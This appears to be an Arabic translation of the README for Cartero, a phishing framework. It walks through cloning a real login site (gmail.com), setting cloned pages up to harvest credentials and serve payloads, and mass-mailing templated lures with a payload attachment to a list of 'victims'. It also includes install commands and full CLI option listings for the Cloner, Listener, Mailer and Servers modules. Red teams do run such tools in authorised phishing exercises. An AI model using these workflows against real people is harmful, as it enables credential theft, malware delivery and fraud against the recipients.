
إطار عمل معياري للتصيد الاحتيالي مع CLI لاستنساخ المواقع، وإرسال رسائل بريد إلكتروني قوالبية، وإطلاق حملات تصيد عبر البريد الإلكتروني وSMS وiMessage وLinkedIn.
http://section9labs.github.io/Cartero/
إطار عمل قوي للتصيد الاحتيالي مع واجهة سطر أوامر متكاملة. وُلد المشروع من الحاجة الملحّة عبر سنوات من التعامل مع أدوات لم تؤدِّ المطلوب. وعلى الرغم من وجود العديد من المشاريع في هذا المجال، لم نتمكن من إيجاد حل مناسب يمنحنا سهولة الاستخدام وقابلية التخصيص معًا.
كارترو مشروع نمطي مقسّم إلى أوامر تنفّذ مهامًا مستقلة (مثل: Mailer، Cloner، Listener، AdminConsole، إلخ...). بالإضافة إلى ذلك، يتميز كل أمر فرعي بخيارات تكوين قابلة للتكرار لتهيئة عملك وأتمتته.
على سبيل المثال، إذا أردنا استنساخ gmail.com، يكفي تنفيذ الأوامر التالية.```shell ❯❯❯ ./cartero Cloner --url https://gmail.com --path /tmp --webserver gmail_com ❯❯❯ ./cartero Listener --webserver /tmp/gmail_com -p 80 Launching mongodb Puma starting in single mode...
بمجرد أن يكون لدينا موقع يعمل، يمكننا ببساطة استخدام أمر Mailer لإرسال رسائل بريد إلكتروني بنماذج جاهزة إلى ضحايانا:```shell
❯❯❯ ./cartero Mailer --data victims.json --server gmail_com --subject "Internal Memo" --htmlbody email_html.html --attachment payload.pdf --from "John Doe <[email protected]>"
Sending [email protected]
Sending [email protected]
Sending [email protected]
انضم إلى مجتمع Slack الخاص بنا على https://carteroslack.herokuapp.com/
باستخدام brew 2.1.5 ruby كمكتبة ruby الافتراضية```shell ❯❯❯ curl -L https://raw.githubusercontent.com/Section9Labs/Cartero/master/data/scripts/setup.sh | bash
باستخدام تثبيت RVM 2.1.5 ruby```shell
❯❯❯ curl -L https://raw.githubusercontent.com/Section9Labs/Cartero/master/data/scripts/setup.sh | bash -s -- -r
❯❯❯ \curl -sSL https://get.rvm.io | bash -s stable --ruby
##### MongoDB
يستخدم كارترو مكتبة MongoDB + MongoID لتخزين البيانات في جانب المستمع والإدارة.
على OSX:```shell
❯❯❯ brew install mongodb
على Ubuntu / Kali / Debian```shell ❯❯❯ apt-get install mongodb
على Arch Linux```
❯❯❯ pacman -Syu mongodb
❯❯❯ git clone https://github.com/section9labs/Cartero ❯❯❯ cd Cartero ❯❯❯ gem install bundle ❯❯❯ bundle install ❯❯❯ cd bin
### الاستخدام
### الأوامر
Cartero هو CLI قوي وسهل الاستخدام للغاية.```shell
❯❯❯ ./cartero
Usage: cartero [options]
List of Commands:
AdminConsole, AdminWeb, Mailer, Cloner, Listener, Servers, Templates
Global options:
--proxy [HOST:PORT] Sets TCPSocket Proxy server
-c, --config [CONFIG_FILE] Provide a different cartero config file
-v, --[no-]verbose Run verbosely
-p [PORT_1,PORT_2,..,PORT_N], Global Flag fo Mailer and Webserver ports
--ports
-m, --mongodb [HOST:PORT] Global Flag fo Mailer and Webserver ports
-d, --debug Sets debug flag on/off
--editor [EDITOR] Edit Server
Common options:
-h, --help [COMMAND] Show this message
--list-commands Prints list of commands for bash completion
--version Shows cartero CLI version
هذا غلاف بسيط لـ MongoDB يتيح لنا تشغيل وإيقاف قاعدة البيانات بالأوامر المناسبة وعلى المسار الصحيح ~/.cartero.```shell ❯❯❯ ./cartero Mongo Usage: Cartero Mongo [options] -s, --start Start MongoDB -k, --stop Stop MongoDB -r, --restart Restart MongoDB -b, --bind [HOST:PORT] Set MongoDB bind_ip and port
Common options: -h, --help Show this message --list-options Show list of available options
#### Cloner
أداة استنساخ مواقع ويب تتيح لنا تنزيل موقع وتحويله إلى تطبيق خادم ويب Cartero.
يمكننا بسرعة وسهولة تخصيص الموقع لالتقاط بيانات الاعتماد (Harvest Credentials) أو تقديم الحمولات (Server Payloads) أو تعديل الموقع بالكامل لأي عدد من الأغراض.```shell
❯❯❯ ./cartero Cloner
Usage: Cartero Cloner [options]
-U, --url [URL_PATH] Full Path of site to clone
-W, --webserver [SERVER_NAME] Sets WebServer name to use
-p, --path [PATH] Sets path to save webserver
-P, --payload [PAYLOAD_PATH] Sets payload path
--useragent [UA_STRING] Sets user agent for cloning
--wget Use wget to clone url
--apache Generate Apache Proxy conf
Common options:
-h, --help Show this message
--list-options Show list of available options
بشكل افتراضي، يستخدم الأمر تنفيذ Ruby الخاص بنا لتنزيل الروابط وتحويلها للعرض، ولكننا ندعم أيضًا خيار --wget الذي سيستخدم أمر النظام المحلي wget.
المستمع مسؤول عن تشغيل خادم الويب الذي تم إنشاؤه عبر Cloner أو موقع تم إنشاؤه يدويًا. بشكل افتراضي، نقدم موقعًا إلكترونيًا بسيطًا جدًا إذا لم يتم توفير أي موقع.```shell ❯❯❯ ./cartero Listener Usage: Cartero Listener [options] -i, --ip [1.1.1.1] Sets IP interface, default is 0.0.0.0 -p [PORT_1,PORT_2,..,PORT_N], Sets Email Payload Ports to scan --ports -s, --ssl Run over SSL. [this also requires --sslcert and --sslkey] -C, --sslcert [CERT_PATH] Sets Email Payload Ports to scan -K, --sslkey [KEY_PATH] Sets SSL key to use for Listener. -V, --views [VIEWS_FOLDER] Sets SSL Certificate to use for Listener. -P, --public [PUBLIC_FOLDER] Sets a Sinatra public_folder -W [WEBSERVER_FOLDER], Sets the sinatra full path from cloner. --webserver --payload [PAYLOAD] Sets a payload download to serve on /download --customapp [CUSTOM_SINATRA] Sets a custom Sinatra::Base WebApp. Important, WebApp name should be camelized of filename
Common options: -h, --help Show this message --list-options Show list of available options
يدعم WebServers مفاتيح SSL ومضيفات افتراضية عبر عدة عناوين IP وأسماء مضيفين ومنافذ.
#### Servers
لإرسال حملات البريد الإلكتروني، نحتاج إلى إعداد خوادم البريد الإلكتروني، ويتيح هذا الأمر لـ Cartero إنشاء الخوادم وتخزينها وسردها. تُخزَّن جميع البيانات في دليل الإعدادات ~/.cartero.```shell
./cartero Servers
Usage: Cartero Servers [options]
-a, --add [NAME] Add Server
-e, --edit [NAME] Edit Server
-d, --delete [NAME] Edit Server
-l, --list List servers
Configuration options:
-T, --type [TYPE] Set the type
-U, --url [DOMAIN] Set the Mail or WebMail url/address
-M, --method [METHOD] Sets the WebMail Request Method to use [GET|POST]
--api-access [API_KEY] Sets the Linkedin API Access Key
--api-secret [API_SECRET] Sets the Linkedin API Secret Key
--oauth-token [OAUTH_TOKEN] Sets the Linkedin OAuth Token Key
--oauth-secret [OAUTH_SECRET]
Sets the Linkedin OAuth Secret Key
Common options:
-h, --help Show this message
--list-options Show list of available options
تمامًا مثل الخوادم، تحتاج حملات البريد الإلكتروني أيضًا إلى قالب محدد مسبقًا لإرسال المحتوى إلى الضحايا. تتيح هذه الوحدة للمهاجم تتبع القوالب المستخدمة في حملته وإنشاءها وسردها وتعديلها.